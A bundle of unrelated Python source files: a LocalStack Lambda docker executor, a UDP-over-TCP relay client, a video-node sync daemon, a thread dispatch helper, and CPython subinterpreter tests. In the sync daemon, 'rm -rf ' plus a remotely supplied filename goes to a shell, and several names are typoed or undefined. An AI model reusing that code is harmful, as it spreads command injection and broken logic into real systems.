:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' --rm'
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' %s' # network
' lambci/lambda:%s'
) % (docker_cmd, container_name, env_vars_str, network_str, runtime)
LOG.debug(cmd)
run(cmd)
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: lambci/lambda:%s' % runtime)
cmd = (
'%s image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' lambci/lambda:%s'
) % (docker_cmd, runtime)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'%s stop -t0 %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'%s rm %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
docker_cmd = self._docker_cmd()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s'
' %s'
' %s'
' %s' # network
' --rm'
' "lambci/lambda:%s" %s'
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, runtime, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = self.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' --rm'
' "lambci/lambda:%s" %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string, network_str, runtime, command)
return cmd
def get_host_path_for_path_in_docker(self, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
with CaptureOutput() as c:
process.run()
result = queue.get()
# TODO: Interweaving stdout/stderr currently not supported
log_output = ''
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
return result, log_output
def execute_java_lambda(self, event, context, handler, main_file):
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s' % (LAMBDA_EXECUTOR_JAR, main_file)
cmd = 'java -cp %s %s %s %s' % (classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
result, log_output = self.run_lambda_executor(cmd)
LOG.debug('Lambda result / log output:\n%s\n> %s' % (
result.strip(), log_output.strip().replace('\n', '\n> ')))
return result, log_output
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
return opts
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_LOCAL
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
client.py
|
import socket
from threading import Thread
import config
from utils import recv, log, info, spawn
class Client:
def __init__(self):
self.c = socket.socket(2, 2)
self.c.bind(config.client_listen_addr)
self.game_addr = None
def relay(self, tcp_conn, udp_conn):
while True:
data = recv(tcp_conn)
log('server -> local:', data)
if data is None:
tcp_conn.close()
return
udp_conn.sendto(data, self.game_addr)
def run(self):
s = socket.socket()
s.connect(config.server_listen_addr)
# t = Thread(target=self.relay, args=(s, self.c))
# t.setDaemon(True)
# t.start()
spawn(target=self.relay, args=(s, self.c))
while True:
data, self.game_addr = self.c.recvfrom(4096)
log('local -> server:', data)
s.sendall(str(len(data)).encode() + b'\n' + data)
def supervisor(self):
info('UDP Over TCP Client start on', config.client_listen_addr)
while True:
t = spawn(target=self.run)
t.join()
info('Reconnect...')
def main():
c = Client()
c.supervisor()
if __name__ == '__main__':
main()
|
vms_async_slave.py
|
# coding: utf-8
#------------------------------
# 计划任务
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
import base64
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
sys.path.append(os.getcwd() + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import requests
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isDEmpty(data):
if len(data) > 0:
return False
return True
#------------Private Methods--------------
#------------Public Methods--------------
def download(url, file_path):
# 第一次请求是为了得到文件总大小
r1 = request.get(url, stream=True, verify=False)
total_size = int(r1.headers['Content-Length'])
# 这重要了,先看看本地文件下载了多少
if os.path.exists(file_path):
temp_size = os.path.getsize(file_path) # 本地已经下载的文件大小
else:
temp_size = 0
# 显示一下下载了多少
print(temp_size)
print(total_size)
# 核心部分,这个是请求下载时,从本地文件已经下载过的后面下载
headers = {'Range': 'bytes=%d-' % temp_size}
# 重新请求网址,加入新的请求头的
r = requests.get(url, stream=True, verify=False, headers=headers)
# 下面写入文件也要注意,看到"ab"了吗?
# "ab"表示追加形式写入文件
with open(file_path, "ab") as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
temp_size += len(chunk)
f.write(chunk)
f.flush()
###这是下载实现进度显示####
done = int(50 * temp_size / total_size)
sys.stdout.write("\r[%s%s] %d%%" % (
'█' * done, ' ' * (50 - done), 100 * temp_size / total_size))
sys.stdout.flush()
print() # 避免上面\r 回车符
def isNeedAsync():
_list = common.M('node').where(
'ismaster=?', (1,)).select()
run_model = common.M('kv').field('id,name,value').where(
'name=?', ('run_model',)).select()
# print(run_model[0]['value'], len(_list))
if run_model[0]['value'] == '2' and len(_list) >= 1:
return True
return False
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if (run_model == '1') or (run_is_master == '1'):
return True
return False
def getNodeList(ismaster=1):
_list = common.M('node').field('id,info,port,name,ip').where(
'ismaster=?', (ismaster,)).select()
return _list
def getTaskList(ismaster=0, status=0, action=1):
_list = common.M('task').field('id,ismaster,mark,sign,vid,status,action,uptime,addtime').where(
'ismaster=? and status=? and action=?', (ismaster, status, action)).limit('1').select()
return _list
def getMasterNodeURL():
_list = getNodeList()
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
return _url
def postNode(_list):
ret = common.httpPost(api_url, {
'source': {
"name": common.getSysKV('run_mark'),
"ip": common.getLocalIp(),
"port": common.readFile('data/port.pl'),
"ismaster": common.getSysKV('run_is_master')
},
'name': _list[0]['name']
})
retDic = json.loads(ret)
#------------Public Methods--------------
def asyncNodeInfo():
sleep_time = 20
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
_list = common.M('node').field('id,port,name,ip').where(
'ismaster=?', (1,)).select()
if len(_list) < 1:
time.sleep(sleep_time)
continue
print("async Node info !!! start")
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
api_url = _url + "/async_master_api/node"
ret = common.httpPost(api_url, {
'source': {
"name": common.getSysKV('run_mark'),
"ip": common.getLocalIp(),
"port": common.readFile('data/port.pl'),
"ismaster": common.getSysKV('run_is_master')
},
'name': _list[0]['name']
})
retDic = json.loads(ret)
if retDic['code'] == 0:
nodeM = common.M('node')
for i in retDic['data']:
dataList = nodeM.field('name,ip,port,ismaster').where(
'name=?', (i['name'],)).select()
if len(dataList) < 1:
r = nodeM.add("name,ip,port,info,ismaster,uptime,addtime",
(i['name'], i['ip'], i['port'], i['info'], i['ismaster'], common.getDate(), common.getDate()))
if r > 0:
print("node add ok")
else:
r = nodeM.where('name=?', (i['name'],)).save('ip,port,info,ismaster,uptime', (i[
'ip'], i['port'], i['info'], i['ismaster'], common.getDate()))
if r > 0:
print("node update ok")
print("async Node info !!! end")
time.sleep(sleep_time)
def asyncVideoDBData():
sleep_time = 3
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
# 异步通知已经执行
video_db_ischange = common.getSysKV('video_db_ischange')
if video_db_ischange == '0':
time.sleep(sleep_time)
continue
_list = common.M('node').field('id,port,name,ip').where(
'ismaster=?', (1,)).select()
if len(_list) < 1:
time.sleep(sleep_time)
continue
print('async VideoDB!!!')
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
api_url = _url + "/async_master_api/videoDbInfo"
pageInfo = common.httpPost(api_url)
pageInfo = json.loads(pageInfo)
pageSize = 1024
pageNum = int(pageInfo['data']) / pageSize
# print(pageNum, pageInfo['data'])
api_range_url = _url + "/async_master_api/videoDbRange"
common.writeFileClear('data/tmp.db')
for x in xrange(0, pageNum):
start = x * pageSize
data = common.httpPost(api_range_url, {
'start': start,
'slen': pageSize,
})
data = json.loads(data)
fdata = base64.b64decode(data['data'])
common.writeFileAppend('data/tmp.db', fdata)
tmpMd5 = common.calMD5ForFile('data/tmp.db')
videoMd5 = common.calMD5ForFile('data/video.db')
if tmpMd5 != videoMd5:
os.remove('data/video.db')
os.rename('data/tmp.db', 'data/video.db')
print('async VideoDB ok!!!')
common.setSysKV('video_db_ischange', '0')
time.sleep(sleep_time)
def videoDownload(url, pos):
# print(pos, url)
fdir = os.path.dirname(pos)
if not os.path.exists(fdir):
common.mkdir(fdir)
c = common.httpGet(url)
common.writeFile(pos, c)
def asyncVideoFile():
sleep_time = 3
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
task_list = getTaskList(0, 0)
if len(task_list) < 1:
time.sleep(sleep_time)
continue
url = getMasterNodeURL()
print('async VideoFile!!!')
api_url = url + "/async_master_api/fileList"
ret = common.httpPost(api_url, {
'vid': task_list[0]['vid'],
'name': task_list[0]['mark']
})
if ret:
r = json.loads(ret)
if r['code'] != 0:
print(r['msg'])
continue
for i in r['data']:
file_url = url + '/' + i.replace('app', 'v')
videoDownload(file_url, i)
common.M('task').where(
'id=?', (task_list[0]['id'],)).setField('status', 1)
time.sleep(sleep_time)
def asyncVideoFileDel():
sleep_time = 20
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
task_list = task_list = getTaskList(0, 0, 2)
if len(task_list) < 1:
time.sleep(sleep_time)
continue
print('async asyncVideoFileDel!!!')
sign = task_list[0]['sign']
filename = sign.split('|')[1]
pathfile = os.getcwd() + "/app/" + filename
if os.path.exists(pathfile):
common.execShell('rm -rf ' + pathfile)
if os.path.exists(pathfile):
del_file(pathfile)
os.removedirs(pathfile)
common.M('task').where(
'id=?', (task_list[0]['id'],)).setField('status', 1)
time.sleep(sleep_time)
def asyncTaskCallBack():
sleep_time = 3
while True:
if isMasterNode():
time.sleep(sleep_time)
continue
task_list = _list = common.M('task').field('id,ismaster,mark,sign,vid,status,action,uptime,addtime').where(
'ismaster=? and status=?', (0, 1)).limit('1').select()
if len(task_list) < 1:
time.sleep(sleep_time)
continue
print('async asyncTask Callback!!!')
for x in xrange(0, len(task_list)):
url = getMasterNodeURL()
api_url = url + "/async_master_api/asyncTaskCallBack"
ret = common.httpPost(api_url, {
'mark': common.getSysKV('run_mark'),
'name': task_list[x]['mark'],
'vid': task_list[x]['vid'],
'action': task_list[x]['action'],
})
data = json.loads(ret)
if data['code'] != 0:
print(data['msg'])
else:
common.M('task').where(
'id=?', (task_list[x]['id'],)).setField('status', 2)
time.sleep(sleep_time)
def startTask():
import time
try:
while True:
time.sleep(2)
except:
time.sleep(60)
startTask()
if __name__ == "__main__":
# 同步节点数据
t = threading.Thread(target=asyncNodeInfo)
t.setDaemon(True)
t.start()
# 全量同步
t = threading.Thread(target=asyncVideoDBData)
t.setDaemon(True)
t.start()
# 同步文件
t = threading.Thread(target=asyncVideoFile)
t.setDaemon(True)
t.start()
# 同步文件删除
t = threading.Thread(target=asyncVideoFileDel)
t.setDaemon(True)
t.start()
# 同步文件完成回调
t = threading.Thread(target=asyncTaskCallBack)
t.setDaemon(True)
t.start()
startTask()
|
dispatch.py
|
import threading
import Queue
import traceback
def request_results(func, args=(), kwargs={}):
# prepare request
results = Queue.Queue()
func_args = (args, kwargs)
instruct = func, func_args, results
# ask the thread
worker = threading.Thread(target=_compute_results_, args=instruct)
worker.daemon = True
worker.start()
# return the empty results, it is up to the GUI to wait for it
return results
def after_completion(window, queue, func):
def check():
try:
result = queue.get(block=False)
except:
window.after(1000, check)
else:
func(result)
window.after(100, check)
def _compute_results_(func, func_args, results):
"""
This is where the actual work is done,
and is run entirely in the new worker thread.
"""
args, kwargs = func_args
try: _results = func(*args, **kwargs)
except Exception as errmsg:
_results = Exception(traceback.format_exc() )
results.put( _results )
|
test__xxsubinterpreters.py
|
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
def _wait_for_interp_to_run(interp, timeout=None):
# bpo-37224: Running this test file in multiprocesses will fail randomly.
# The failure reason is that the thread can't acquire the cpu to
# run subinterpreter eariler than the main thread in multiprocess.
if timeout is None:
timeout = support.SHORT_TIMEOUT
start_time = time.monotonic()
deadline = start_time + timeout
while not interpreters.is_running(interp):
if time.monotonic() > deadline:
raise RuntimeError('interp is not running')
time.sleep(0.010)
@contextlib.contextmanager
def _running(interp):
r, w = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# wait for "signal"
with open({r}) as rpipe:
rpipe.read()
"""))
t = threading.Thread(target=run)
t.start()
_wait_for_interp_to_run(interp)
yield
with open(w, 'w') as spipe:
spipe.write('done')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise ... # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_strs(self):
self._assert_values(['hello world', '你好世界', ''])
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
@unittest.skip("sgross: skip subinterpreter tests")
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
@unittest.skip("sgross: skip subinterpreter tests")
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
@unittest.skip("sgross: skip subinterpreter tests")
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
@unittest.skip("sgross: skip subinterpreter tests")
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.is_running(-1)
@unittest.skip("sgross: skip subinterpreter tests")
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
id = interpreters.InterpreterID(Int(), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters.InterpreterID, object())
self.assertRaises(TypeError, interpreters.InterpreterID, 10.0)
self.assertRaises(TypeError, interpreters.InterpreterID, '10')
self.assertRaises(TypeError, interpreters.InterpreterID, b'10')
self.assertRaises(ValueError, interpreters.InterpreterID, -1)
self.assertRaises(OverflowError, interpreters.InterpreterID, 2**64)
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
